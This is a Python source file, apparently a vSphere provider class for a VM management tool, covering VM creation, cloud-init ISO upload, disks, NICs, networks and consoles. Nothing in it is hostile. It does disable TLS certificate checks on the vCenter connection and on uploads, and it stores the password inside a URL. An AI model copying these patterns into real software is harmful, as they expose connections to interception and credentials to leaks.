objSpec = vmodl.query.PropertyCollector.ObjectSpec(obj=vm)
objSpecs.append(objSpec)
filterSpec = vmodl.query.PropertyCollector.FilterSpec()
filterSpec.objectSet = objSpecs
propSet = vmodl.query.PropertyCollector.PropertySpec(all=False)
propSet.type = vim.VirtualMachine
propSet.pathSet = ['config.extraConfig.plan']
filterSpec.propSet = [propSet]
return filterSpec
def filter_results(results):
vms = []
for o in results.objects:
if o.propSet[0].val is not None:
vms.append(o.obj)
return vms
def changecd(si, vm, iso):
virtual_cdrom_device = None
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualCdrom):
virtual_cdrom_device = dev
cdromspec = vim.vm.device.VirtualDeviceSpec()
cdromspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.edit
cdromspec.device = vim.vm.device.VirtualCdrom()
cdromspec.device.controllerKey = virtual_cdrom_device.controllerKey
cdromspec.device.key = virtual_cdrom_device.key
cdromspec.device.connectable = vim.vm.device.VirtualDevice.ConnectInfo()
cdromspec.device.backing = vim.vm.device.VirtualCdrom.IsoBackingInfo()
cdromspec.device.backing.fileName = iso
cdromspec.device.connectable.connected = True
cdromspec.device.connectable.startConnected = True
cdromspec.device.connectable.allowGuestControl = True
dev_changes = []
dev_changes.append(cdromspec)
spec = vim.vm.ConfigSpec()
spec.deviceChange = dev_changes
task = vm.ReconfigVM_Task(spec=spec)
return task
raise RuntimeError("No cdrom found")
def createfolder(si, parentfolder, folder):
if find(si, parentfolder, vim.Folder, folder) is None:
parentfolder.CreateFolder(folder)
return None
def deletefolder(si, parentfolder, folder):
folder = find(si, parentfolder, vim.Folder, folder)
if folder is not None:
folder.Destroy()
def deletedirectory(si, dc, path):
d = si.content.fileManager.DeleteFile(path, dc)
waitForMe(d)
def keep_lease_alive(lease):
while(True):
time.sleep(5)
try:
lease.HttpNfcLeaseProgress(50)
if (lease.state == vim.HttpNfcLease.State.done):
return
except:
return
class Ksphere:
def __init__(self, host, user, password, datacenter, cluster, debug=False, isofolder=None,
filtervms=False, filteruser=False, filtertag=None):
# 4-1-CONNECT
si = connect.SmartConnect(host=host, port=443, user=user, pwd=password, sslContext=_create_unverified_context())
self.conn = si
self.si = si
self.vcip = host
self.url = "https://%s:%s@%s/sdk" % (user, password, host)
self.user = user
self.password = password
self.rootFolder = si.content.rootFolder
self.dc = find(si, self.rootFolder, vim.Datacenter, datacenter)
self.macaddr = []
self.clu = cluster
self.isofolder = isofolder
self.filtervms = filtervms
self.filtervms = filtervms
self.filteruser = filteruser
self.filtertag = filtertag
self.debug = debug
self.networks = []
view = si.content.viewManager.CreateContainerView(self.rootFolder, [vim.Network], True)
netlist = collectproperties(si, view=view, objtype=vim.Network, pathset=['name'], includemors=True)
for o in netlist:
self.networks.append(o['obj'].name)
portgs = {}
o = si.content.viewManager.CreateContainerView(self.rootFolder, [vim.DistributedVirtualSwitch], True)
dvnetworks = o.view
o.Destroy()
for dvnetw in dvnetworks:
uuid = dvnetw.uuid
for portg in dvnetw.portgroup:
portgs[portg.name] = [uuid, portg.key]
self.portgs = portgs
return
def close(self):
self.si.content.sessionManager.Logout()
def exists(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
return True if vm is not None else False
def net_exists(self, name):
print("not implemented")
return
def create(self, name, virttype=None, profile='kvirt', flavor=None, plan='kvirt', cpumodel='host-model',
cpuflags=[], cpupinning=[], numcpus=2, memory=512, guestid='centos7_64Guest', pool='default', image=None,
disks=[{'size': 10}], disksize=10, diskthin=True, diskinterface='virtio', nets=['default'], iso=None,
vnc=False, cloudinit=True, reserveip=False, reservedns=False, reservehost=False, start=True, keys=None,
cmds=[], ips=None, netmasks=None, gateway=None, nested=True, dns=None, domain=None, tunnel=False,
files=[], enableroot=True, overrides={}, tags=[], storemetadata=False, sharedfolders=[],
kernel=None, initrd=None, cmdline=None, placement=[], autostart=False, cpuhotplug=False,
memoryhotplug=False, numamode=None, numa=[], pcidevices=[], tpm=False, rng=False, metadata={},
securitygroups=[]):
dc = self.dc
vmFolder = dc.vmFolder
diskmode = 'persistent'
default_diskinterface = diskinterface
default_diskthin = diskthin
default_disksize = disksize
default_pool = pool
memory = int(memory)
numcpus = int(numcpus)
si = self.si
rootFolder = self.rootFolder
cluster = overrides.get('cluster')
if cluster is not None:
createfolder(si, dc.vmFolder, cluster)
vmfolder = find(si, dc.vmFolder, vim.Folder, cluster)
elif plan != 'kvirt':
createfolder(si, dc.vmFolder, plan)
vmfolder = find(si, dc.vmFolder, vim.Folder, plan)
else:
vmfolder = dc.vmFolder
si = self.si
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
resourcepool = clu.resourcePool
if image is not None:
rootFolder = self.rootFolder
imageobj = findvm(si, rootFolder, image)
if imageobj is None:
return {'result': 'failure', 'reason': "Image %s not found" % image}
clonespec = createclonespec(resourcepool)
confspec = vim.vm.ConfigSpec()
confspec.annotation = name
confspec.memoryMB = memory
confspec.numCPUs = numcpus
extraconfig = []
for entry in [field for field in metadata if field in METADATA_FIELDS]:
opt = vim.option.OptionValue()
opt.key = entry
opt.value = metadata[entry]
extraconfig.append(opt)
clonespec.config = confspec
clonespec.powerOn = False
cloudinitiso = None
if cloudinit:
if image is not None and common.needs_ignition(image):
version = common.ignition_version(image)
ignitiondata = common.ignition(name=name, keys=keys, cmds=cmds, nets=nets, gateway=gateway, dns=dns,
domain=domain, reserveip=reserveip, files=files,
enableroot=enableroot, overrides=overrides, version=version,
plan=plan, image=image)
ignitionopt = vim.option.OptionValue()
ignitionopt.key = 'guestinfo.ignition.config.data'
ignitionopt.value = base64.b64encode(ignitiondata.encode()).decode()
encodingopt = vim.option.OptionValue()
encodingopt.key = 'guestinfo.ignition.config.data.encoding'
encodingopt.value = 'base64'
extraconfig.extend([ignitionopt, encodingopt])
else:
gcmds = []
if image is not None and 'cos' not in image and 'fedora-coreos' not in image:
lower = image.lower()
if lower.startswith('fedora') or lower.startswith('rhel') or lower.startswith('centos'):
gcmds.append('yum -y install open-vm-tools')
elif lower.startswith('debian') or [x for x in UBUNTUS if x in lower] or 'ubuntu' in lower:
gcmds.append('apt-get update')
gcmds.append('apt-get -f install open-vm-tools')
gcmds.append('systemctl enable --now vmtoolsd')
index = 0
if image is not None and image.startswith('rhel'):
subindex = [i for i, value in enumerate(cmds) if value.startswith('subscription-manager')]
if subindex:
index = subindex.pop() + 1
cmds = cmds[:index] + gcmds + cmds[index:]
# customspec = makecuspec(name, nets=nets, gateway=gateway, dns=dns, domain=domain)
# clonespec.customization = customspec
isofolder = self.isofolder if self.isofolder is not None else "[%s]/%s" % (default_pool, name)
cloudinitiso = "%s/%s.ISO" % (isofolder, name)
userdata, meta, netdata = common.cloudinit(name=name, keys=keys, cmds=cmds, nets=nets,
gateway=gateway, dns=dns, domain=domain,
reserveip=reserveip, files=files,
enableroot=enableroot, overrides=overrides,
storemetadata=storemetadata, machine='vsphere',
image=image)
confspec.extraConfig = extraconfig
t = imageobj.CloneVM_Task(folder=vmfolder, name=name, spec=clonespec)
waitForMe(t)
if cloudinitiso is not None:
with TemporaryDirectory() as tmpdir:
common.make_iso(name, tmpdir, userdata, meta, netdata)
cloudinitisofile = "%s/%s.ISO" % (tmpdir, name)
if self.isofolder is not None:
isofolder = self.isofolder.split('/')
isopool = re.sub(r"[\[\]]", '', isofolder[0])
isofolder = isofolder[1]
else:
isopool = default_pool
isofolder = None
self._uploadimage(isopool, cloudinitisofile, name, isofolder=isofolder)
vm = findvm(si, vmFolder, name)
c = changecd(self.si, vm, cloudinitiso)
waitForMe(c)
datastores = {}
confspec = vim.vm.ConfigSpec()
confspec.name = name
confspec.annotation = name
confspec.memoryMB = memory
confspec.numCPUs = numcpus
confspec.extraConfig = []
for entry in [field for field in metadata if field in METADATA_FIELDS]:
opt = vim.option.OptionValue()
opt.key = entry
opt.value = metadata[entry]
confspec.extraConfig.append(opt)
if nested:
confspec.nestedHVEnabled = True
confspec.guestId = 'centos7_64Guest'
vmfi = vim.vm.FileInfo()
filename = "[" + default_pool + "]"
vmfi.vmPathName = filename
confspec.files = vmfi
if vnc:
vncport = random.randint(5900, 7000)
opt1 = vim.option.OptionValue()
opt1.key = 'RemoteDisplay.vnc.port'
opt1.value = vncport
opt2 = vim.option.OptionValue()
opt2.key = 'RemoteDisplay.vnc.enabled'
opt2.value = "TRUE"
confspec.extraConfig = [opt1, opt2]
if image is None:
t = vmfolder.CreateVM_Task(confspec, resourcepool)
waitForMe(t)
vm = find(si, dc.vmFolder, vim.VirtualMachine, name)
currentdevices = vm.config.hardware.device
currentdisks = [d for d in currentdevices if isinstance(d, vim.vm.device.VirtualDisk)]
currentnics = [d for d in currentdevices if isinstance(d, vim.vm.device.VirtualEthernetCard)]
confspec = vim.vm.ConfigSpec()
devconfspec = []
for index, disk in enumerate(disks):
if disk is None:
disksize = default_disksize
diskthin = default_diskthin
diskinterface = default_diskinterface
diskpool = default_pool
elif isinstance(disk, int):
disksize = disk
diskthin = default_diskthin
diskinterface = default_diskinterface
diskpool = default_pool
elif isinstance(disk, str) and disk.isdigit():
disksize = int(disk)
diskthin = default_diskthin
diskinterface = default_diskinterface
diskpool = default_pool
elif isinstance(disk, dict):
disksize = disk.get('size', default_disksize)
diskthin = disk.get('thin', default_diskthin)
diskinterface = disk.get('interface', default_diskinterface)
diskpool = disk.get('pool', default_pool)
if index < len(currentdisks) and image is not None:
currentdisk = currentdisks[index]
currentsize = convert(1000 * currentdisk.capacityInKB, GB=False)
if int(currentsize) < disksize:
pprint("Waiting for image disk %s to be resized" % index)
currentdisk.capacityInKB = disksize * 1048576
diskspec = vim.vm.ConfigSpec()
diskspec = vim.vm.device.VirtualDeviceSpec(device=currentdisk, operation="edit")
devconfspec.append(diskspec)
continue
disksize = disksize * 1048576
if diskpool not in datastores:
datastore = find(si, rootFolder, vim.Datastore, diskpool)
if not datastore:
return {'result': 'failure', 'reason': "Pool %s not found" % diskpool}
else:
datastores[diskpool] = datastore
if index == 0:
scsispec = createscsispec()
devconfspec.append(scsispec)
diskspec = creatediskspec(index, disksize, datastore, diskmode, diskthin)
devconfspec.append(diskspec)
# NICSPEC
for index, net in enumerate(nets):
netname = net['name'] if isinstance(net, dict) else net
if netname == 'default':
netname = 'VM Network'
if index < len(currentnics):
currentnic = currentnics[index]
try:
currentnetwork = currentnic.backing.deviceName
except:
currentswitchuuid = currentnic.backing.port.switchUuid
currentportgroupkey = currentnic.backing.port.portgroupKey
for dvsnet in self.portgs:
if self.portgs[dvsnet][0] == currentswitchuuid and\
self.portgs[dvsnet][1] == currentportgroupkey:
currentnetwork = dvsnet
if currentnetwork != netname:
if netname in self.portgs:
switchuuid = self.portgs[netname][0]
portgroupkey = self.portgs[netname][1]
currentnic.backing.port.switchUuid = switchuuid
currentnic.backing.port.portgroupKey = portgroupkey
nicspec = vim.vm.device.VirtualDeviceSpec(device=currentnic, operation="edit")
devconfspec.append(nicspec)
elif netname in self.networks:
currentnic.backing.deviceName = netname
nicspec = vim.vm.device.VirtualDeviceSpec(device=currentnic, operation="edit")
devconfspec.append(nicspec)
else:
return {'result': 'failure', 'reason': "Invalid network %s" % netname}
continue
nicname = 'Network Adapter %d' % (index + 1)
nictype = net['type'] if isinstance(net, dict) and 'type' in net else None
if netname in self.portgs:
switchuuid = self.portgs[netname][0]
portgroupkey = self.portgs[netname][1]
nicspec = createdvsnicspec(nicname, netname, switchuuid, portgroupkey, nictype=nictype)
elif netname in self.networks:
nicspec = createnicspec(nicname, netname, nictype=nictype)
else:
return {'result': 'failure', 'reason': "Invalid network %s" % netname}
devconfspec.append(nicspec)
if iso:
if '/' not in iso:
matchingisos = [i for i in self._getisos() if i.endswith(iso)]
if matchingisos:
iso = matchingisos[0]
else:
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
cdspec = createisospec(iso)
devconfspec.append(cdspec)
# bootoptions = vim.option.OptionValue(key='bios.bootDeviceClasses',value='allow:hd,cd,fd,net')
# confspec.bootOptions = vim.vm.BootOptions(bootOrder=[vim.vm.BootOptions.BootableCdromDevice()])
confspec.deviceChange = devconfspec
t = vm.Reconfigure(confspec)
waitForMe(t)
if start:
t = vm.PowerOnVM_Task(None)
waitForMe(t)
return {'result': 'success'}
def start(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
if vm.runtime.powerState == "poweredOff":
t = vm.PowerOnVM_Task(None)
waitForMe(t)
return {'result': 'success'}
def stop(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
if vm.runtime.powerState == "poweredOn":
t = vm.PowerOffVM_Task()
waitForMe(t)
return {'result': 'success'}
def status(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
return vm.runtime.powerState if vm is not None else ''
def delete(self, name, snapshots=False):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
plan, image, kube = 'kvirt', None, None
vmpath = vm.summary.config.vmPathName.replace('/%s.vmx' % name, '')
for entry in vm.config.extraConfig:
if entry.key == 'image':
image = entry.value
if entry.key == 'plan':
plan = entry.value
if entry.key == 'kube':
kube = entry.value
if vm.runtime.powerState == "poweredOn":
t = vm.PowerOffVM_Task()
waitForMe(t)
t = vm.Destroy_Task()
waitForMe(t)
if image is not None and 'coreos' not in image and 'rhcos' not in image and\
'fcos' not in image and vmpath.endswith(name):
isopath = "%s/%s.ISO" % (self.isofolder, name) if self.isofolder is not None else vmpath
deletedirectory(si, dc, isopath)
if kube is not None:
clusterfolder = find(si, vmFolder, vim.Folder, kube)
if clusterfolder is not None and len(clusterfolder.childEntity) == 0:
clusterfolder.Destroy()
elif plan != 'kvirt':
planfolder = find(si, vmFolder, vim.Folder, plan)
if planfolder is not None and len(planfolder.childEntity) == 0:
planfolder.Destroy()
return {'result': 'success'}
def console(self, name, tunnel=False, web=False):
si = self.si
dc = self.dc
vcip = self.vcip
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
print("VM %s not found" % name)
return
elif vm.runtime.powerState == "poweredOff":
print("VM down")
return
extraconfig = vm.config.extraConfig
vncfound = False
for extra in extraconfig:
key, value = extra.key, extra.value
if 'vnc' in key and 'port' in key:
vncfound = True
vncport = value
break
else:
continue
if vncfound:
host = vm.runtime.host.name
url = "vnc://%s:%s" % (host, vncport)
consolecommand = "remote-viewer %s &" % (url)
if web:
return url
if self.debug or os.path.exists("/i_am_a_container"):
print(consolecommand)
if not os.path.exists("/i_am_a_container"):
os.popen(consolecommand)
else:
content = si.RetrieveContent()
sgid = content.about.instanceUuid
cert = get_server_certificate((self.vcip, 443))
cert_deserialize = x509.load_pem_x509_certificate(cert.encode(), default_backend())
finger_print = hexlify(cert_deserialize.fingerprint(hashes.SHA1())).decode('utf-8')
sha1 = ":".join([finger_print[i: i + 2] for i in range(0, len(finger_print), 2)])
vcenter_data = content.setting
vcenter_settings = vcenter_data.setting
for item in vcenter_settings:
key = getattr(item, 'key')
if key == 'VirtualCenter.FQDN':
fqdn = getattr(item, 'value')
sessionmanager = si.content.sessionManager
session = sessionmanager.AcquireCloneTicket()
vmid = vm._moId
vmurl = "https://%s/ui/webconsole.html?" % vcip
vmurl += "vmId=%s&vmName=%s&serverGuid=%s&host=%s&sessionTicket=%s&thumbprint=%s" % (vmid, name, sgid, fqdn,
session, sha1)
if web:
return vmurl
if self.debug or os.path.exists("/i_am_a_container"):
msg = "Open the following url:\n%s" % vmurl if os.path.exists("/i_am_a_container") else vmurl
pprint(msg)
else:
pprint("Opening url %s" % vmurl)
webbrowser.open(vmurl, new=2, autoraise=True)
def info(self, name, output='plain', fields=[], values=False, vm=None, debug=False):
translation = {'poweredOff': 'down', 'poweredOn': 'up', 'suspended': 'suspended'}
yamlinfo = {}
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
if vm is None:
listinfo = False
vm = findvm(si, vmFolder, name)
if vm is None:
error("VM %s not found" % name)
return {}
else:
listinfo = True
summary = vm.summary
yamlinfo['name'] = name
yamlinfo['id'] = summary.config.instanceUuid
yamlinfo['cpus'] = vm.config.hardware.numCPU
yamlinfo['memory'] = vm.config.hardware.memoryMB
yamlinfo['status'] = translation[vm.runtime.powerState]
yamlinfo['nets'] = []
yamlinfo['disks'] = []
if vm.runtime.powerState == "poweredOn":
yamlinfo['host'] = vm.runtime.host.name
for nic in vm.guest.net:
if 'ip' not in yamlinfo and nic.ipAddress:
yamlinfo['ip'] = nic.ipAddress[0]
for entry in vm.config.extraConfig:
if entry.key in METADATA_FIELDS:
yamlinfo[entry.key] = entry.value
if entry.key == 'image':
yamlinfo['user'] = common.get_user(entry.value)
if listinfo:
return yamlinfo
if debug:
yamlinfo['debug'] = vm.config.extraConfig
devices = vm.config.hardware.device
for number, dev in enumerate(devices):
if "addressType" in dir(dev):
try:
network = dev.backing.deviceName
except:
switchuuid = dev.backing.port.switchUuid
portgroupkey = dev.backing.port.portgroupKey
for dvsnet in self.portgs:
if self.portgs[dvsnet][0] == switchuuid and self.portgs[dvsnet][1] == portgroupkey:
network = dvsnet
device = dev.deviceInfo.label
devicename = type(dev).__name__.replace('vim.vm.device.Virtual', '').lower()
networktype = devicename
mac = dev.macAddress
net = {'device': device, 'mac': mac, 'net': network, 'type': networktype}
yamlinfo['nets'].append(net)
if type(dev).__name__ == 'vim.vm.device.VirtualDisk':
device = "disk%s" % dev.unitNumber
disksize = convert(1000 * dev.capacityInKB, GB=False)
diskformat = dev.backing.diskMode
drivertype = 'thin' if dev.backing.thinProvisioned else 'thick'
path = dev.backing.datastore.name
disk = {'device': device, 'size': int(disksize), 'format': diskformat, 'type': drivertype,
'path': path}
yamlinfo['disks'].append(disk)
return yamlinfo
def list(self):
rootFolder = self.rootFolder
si = self.si
vms = []
view = si.content.viewManager.CreateContainerView(rootFolder, [vim.VirtualMachine], True)
vmlist = collectproperties(si, view=view, objtype=vim.VirtualMachine, pathset=['name'], includemors=True)
for o in vmlist:
vm = o['obj']
if vm.summary.runtime.connectionState != 'orphaned' and not vm.config.template:
if self.filtervms and 'plan' not in [x.key for x in vm.config.extraConfig]:
continue
vms.append(self.info(o['name'], vm=vm))
return sorted(vms, key=lambda x: x['name'])
def list_pools(self):
pools = []
rootFolder = self.rootFolder
si = self.si
# dc = self.dc
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
for dts in clu.datastore:
pools.append(dts.name)
# datastorename = dts.name
# total = dssize(dts)[0].replace('GB', '')
# available = dssize(dts)[1].replace('GB', '')
# results[datastorename] = [float(total), float(available), dc.name]
return pools
def beststorage(self):
rootFolder = self.rootFolder
si = self.si
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
bestds = ''
bestsize = 0
for dts in clu.datastore:
datastorename = dts.name
available = float(dssize(dts)[1].replace('GB', ''))
if available > bestsize:
bestsize = available
bestds = datastorename
return bestds
def _getisos(self):
rootFolder = self.rootFolder
si = self.si
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
isos = []
results = {}
searchspec = vim.host.DatastoreBrowser.SearchSpec()
filequery = [vim.host.DatastoreBrowser.IsoImageQuery(), vim.host.DatastoreBrowser.FolderQuery()]
filequeryflags = vim.host.DatastoreBrowser.FileInfo.Details()
filequeryflags.fileSize = True
filequeryflags.modification = False
filequeryflags.fileOwner = False
filequeryflags.fileType = False
searchspec.query = filequery
searchspec.details = filequeryflags
searchspec.sortFoldersFirst = True
searchspec.searchCaseInsensitive = True
for dts in clu.datastore:
datastorename = dts.name
datastorepath = "[" + datastorename + "]"
browser = dts.browser
t = browser.SearchDatastore_Task(datastorepath, searchspec)
waitForMe(t)
result = t.info.result
fileinfo = result.file
for element in fileinfo:
folderpath = element.path
if not folderpath.endswith('iso') and 'ISO' in folderpath.upper():
t = browser.SearchDatastoreSubFolders_Task("%s%s" % (datastorepath, folderpath), searchspec)
waitForMe(t)
results = t.info.result
for r in results:
fileinfo = r.file
for isofile in fileinfo:
path = isofile.path
if path.endswith('.iso'):
isos.append("%s/%s/%s" % (datastorepath, folderpath, path))
return isos
def volumes(self, iso=False):
if iso:
return self._getisos()
si = self.si
rootFolder = self.rootFolder
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.VirtualMachine], True)
vmlist = o.view
o.Destroy()
return [v.name for v
in vmlist if v.config.template and v.summary is not
None and v.summary.runtime.connectionState != 'orphaned']
def update_metadata(self, name, metatype, metavalue, append=False):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
configspec = vim.vm.ConfigSpec()
opt = vim.option.OptionValue()
opt.key = metatype
opt.value = metavalue
configspec.extraConfig = [opt]
t = vm.ReconfigVM_Task(configspec)
waitForMe(t)
def update_memory(self, name, memory):
print("not implemented")
return
def update_cpus(self, name, numcpus):
print("not implemented")
return
def update_start(self, name, start=True):
print("not implemented")
return
def update_information(self, name, information):
self.update_metadata(name, 'information', information)
return
def update_iso(self, name, iso):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
isos = [i for i in self._getisos() if i.endswith(iso)]
if not isos:
error("Iso %s not found.Leaving..." % iso)
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
else:
iso = isos[0]
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
c = changecd(self.si, vm, iso)
waitForMe(c)
return {'result': 'success'}
def dnsinfo(self, name):
return None, None
def _uploadimage(self, pool, origin, directory, isofolder=None):
si = self.si
rootFolder = self.rootFolder
datastore = find(si, rootFolder, vim.Datastore, pool)
if not datastore:
return {'result': 'failure', 'reason': "Pool %s not found" % pool}
destination = os.path.basename(origin)
if isofolder is not None:
directory = isofolder
url = "https://%s:443/folder/%s/%s?dcPath=%s&dsName=%s" % (self.vcip, directory, destination, self.dc.name,
pool)
client_cookie = si._stub.cookie
cookie_name = client_cookie.split("=", 1)[0]
cookie_value = client_cookie.split("=", 1)[1].split(";", 1)[0]
cookie_path = client_cookie.split("=", 1)[1].split(";", 1)[1].split(";", 1)[0].lstrip()
cookie_text = " " + cookie_value + "; $" + cookie_path
cookie = {cookie_name: cookie_text}
headers = {'Content-Type': 'application/octet-stream'}
with open(origin, "rb") as f:
if hasattr(requests.packages.urllib3, 'disable_warnings'):
requests.packages.urllib3.disable_warnings()
try:
r = requests.put(url, data=f, headers=headers, cookies=cookie, verify=False)
except:
url = url.replace('/folder', '')
r = requests.put(url, data=f, headers=headers, cookies=cookie, verify=False)
if r.status_code not in [200, 201]:
error("Got status %s with reason: %s" % (r.status_code, r.reason))
def get_pool_path(self, pool):
return pool
def add_disk(self, name, size=1, pool=None, thin=True, image=None, shareable=False, existing=None,
interface='virtio', novm=False, overrides={}):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
spec = vim.vm.ConfigSpec()
unit_number = 0
for dev in vm.config.hardware.device:
if hasattr(dev.backing, 'fileName'):
unit_number = int(dev.unitNumber) + 1
if unit_number == 7:
unit_number = 8
if isinstance(dev, vim.vm.device.VirtualSCSIController):
controller = dev
new_disk_kb = int(size) * 1024 * 1024
disk_spec = vim.vm.device.VirtualDeviceSpec()
disk_spec.fileOperation = "create"
disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
disk_spec.device = vim.vm.device.VirtualDisk()
disk_spec.device.backing = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
disk_spec.device.backing.thinProvisioned = thin
disk_spec.device.backing.diskMode = 'persistent'
disk_spec.device.unitNumber = unit_number
disk_spec.device.capacityInKB = new_disk_kb
disk_spec.device.controllerKey = controller.key
dev_changes = [disk_spec]
spec.deviceChange = dev_changes
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
def delete_disk(self, name=None, diskname=None, pool=None, novm=False):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualDisk) and dev.deviceInfo.label == diskname:
devspec = vim.vm.device.VirtualDeviceSpec()
devspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove
devspec.device = dev
spec = vim.vm.ConfigSpec()
spec.deviceChange = [devspec]
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
return {'result': 'failure', 'reason': "Disk %s not found in %s" % (diskname, name)}
def add_nic(self, name, network):
if network == 'default':
network = 'VM Network'
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
spec = vim.vm.ConfigSpec()
nicnumber = len([dev for dev in vm.config.hardware.device if "addressType" in dir(dev)])
nicname = 'Network adapter %d' % (nicnumber + 1)
nicspec = createnicspec(nicname, network)
nic_changes = [nicspec]
spec.deviceChange = nic_changes
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
def delete_nic(self, name, interface):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
if vm is None:
return {'result': 'failure', 'reason': "VM %s not found" % name}
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualEthernetCard) and dev.deviceInfo.label == interface:
devspec = vim.vm.device.VirtualDeviceSpec()
devspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove
devspec.device = dev
spec = vim.vm.ConfigSpec()
spec.deviceChange = [devspec]
t = vm.ReconfigVM_Task(spec=spec)
waitForMe(t)
return {'result': 'success'}
return {'result': 'failure', 'reason': "Nic %s not found in %s" % (interface, name)}
def list_networks(self):
si = self.si
rootFolder = si.content.rootFolder
networks = {}
view = si.content.viewManager.CreateContainerView(rootFolder, [vim.dvs.DistributedVirtualPortgroup], True)
dvslist = collectproperties(si, view=view, objtype=vim.dvs.DistributedVirtualPortgroup, pathset=['name'],
includemors=True)
view = si.content.viewManager.CreateContainerView(rootFolder, [vim.Network], True)
netlist = collectproperties(si, view=view, objtype=vim.Network, pathset=['name'], includemors=True)
for o in netlist:
network = o['obj']
cidr, dhcp, domainname = '', '', ''
mode = 'accessible' if network.summary.accessible else 'notaccessible'
networks[network.name] = {'cidr': cidr, 'dhcp': dhcp, 'domain': domainname, 'type': 'routed', 'mode': mode}
for o in dvslist:
network = o['obj']
cidr, dhcp, domainname, mode = '', '', '', ''
networks[network.name] = {'cidr': cidr, 'dhcp': dhcp, 'domain': domainname, 'type': 'routed', 'mode': mode}
return networks
def create_network(self, name, cidr=None, dhcp=True, nat=True, domain=None, plan='kvirt', overrides={}):
si = self.si
cluster = self.clu
networkFolder = self.dc.networkFolder
rootFolder = self.rootFolder
net = find(si, rootFolder, vim.Network, name)
if net is not None:
return {'result': 'failure', 'reason': "Network %s already there" % name}
o = si.content.viewManager.CreateContainerView(rootFolder, [vim.DistributedVirtualSwitch], True)
dvnetworks = o.view
o.Destroy()
for dvnetw in dvnetworks:
for portg in dvnetw.portgroup:
if portg.name == name:
return {'result': 'failure', 'reason': "Network %s already there" % name}
if overrides.get('distributed', False):
pnic_specs = []
dvs_host_configs = []
uplink_port_names = []
dvs_create_spec = vim.DistributedVirtualSwitch.CreateSpec()
dvs_config_spec = vim.DistributedVirtualSwitch.ConfigSpec()
dvs_config_spec.name = name
dvs_config_spec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy()
for x in range(len(cluster.host)):
uplink_port_names.append("dvUplink%d" % x)
for host in cluster.host:
dvs_config_spec.uplinkPortPolicy.uplinkPortName = uplink_port_names
dvs_config_spec.maxPorts = 2000
pnic_spec = vim.dvs.HostMember.PnicSpec()
pnic_spec.pnicDevice = 'vmnic1'
pnic_specs.append(pnic_spec)
dvs_host_config = vim.dvs.HostMember.ConfigSpec()
dvs_host_config.operation = vim.ConfigSpecOperation.add
dvs_host_config.host = host
dvs_host_configs.append(dvs_host_config)
dvs_host_config.backing = vim.dvs.HostMember.PnicBacking()
dvs_host_config.backing.pnicSpec = pnic_specs
dvs_config_spec.host = dvs_host_configs
dvs_create_spec.configSpec = dvs_config_spec
dvs_create_spec.productInfo = vim.dvs.ProductSpec(version='5.1.0')
networkFolder.CreateDistributedVirtualSwitch()
else:
return {'result': 'failure', 'reason': "Not implemented yet for non dvs networks"}
return {'result': 'success'}
def delete_network(self, name=None, cidr=None):
si = self.si
rootFolder = self.rootFolder
try:
net = find(si, rootFolder, vim.dvs.DistributedVirtualPortgroup, name)
net.Destroy()
except:
try:
net = find(si, rootFolder, vim.Network, name)
net.Destroy()
except:
return {'result': 'failure', 'reason': "Network %s not found" % name}
return {'result': 'success'}
def vm_ports(self, name):
return []
def add_image(self, url, pool, short=None, cmd=None, name=None, size=None):
si = self.si
rootFolder = self.rootFolder
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
resourcepool = clu.resourcePool
vmFolder = self.dc.vmFolder
manager = si.content.ovfManager
shortimage = os.path.basename(url).split('?')[0]
if not shortimage.endswith('ova') and not shortimage.endswith('zip') and find_executable('qemu-img') is None:
msg = "qemu-img is required for conversion"
error(msg)
return {'result': 'failure', 'reason': msg}
if name is None:
name = name.replace('.ova', '').replace('.x86_64', '')
if shortimage in self.volumes():
pprint("Template %s already there" % shortimage)
return {'result': 'success'}
